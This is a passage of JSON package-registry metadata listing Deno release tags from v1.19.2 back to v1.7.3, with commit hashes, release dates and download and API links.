53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_p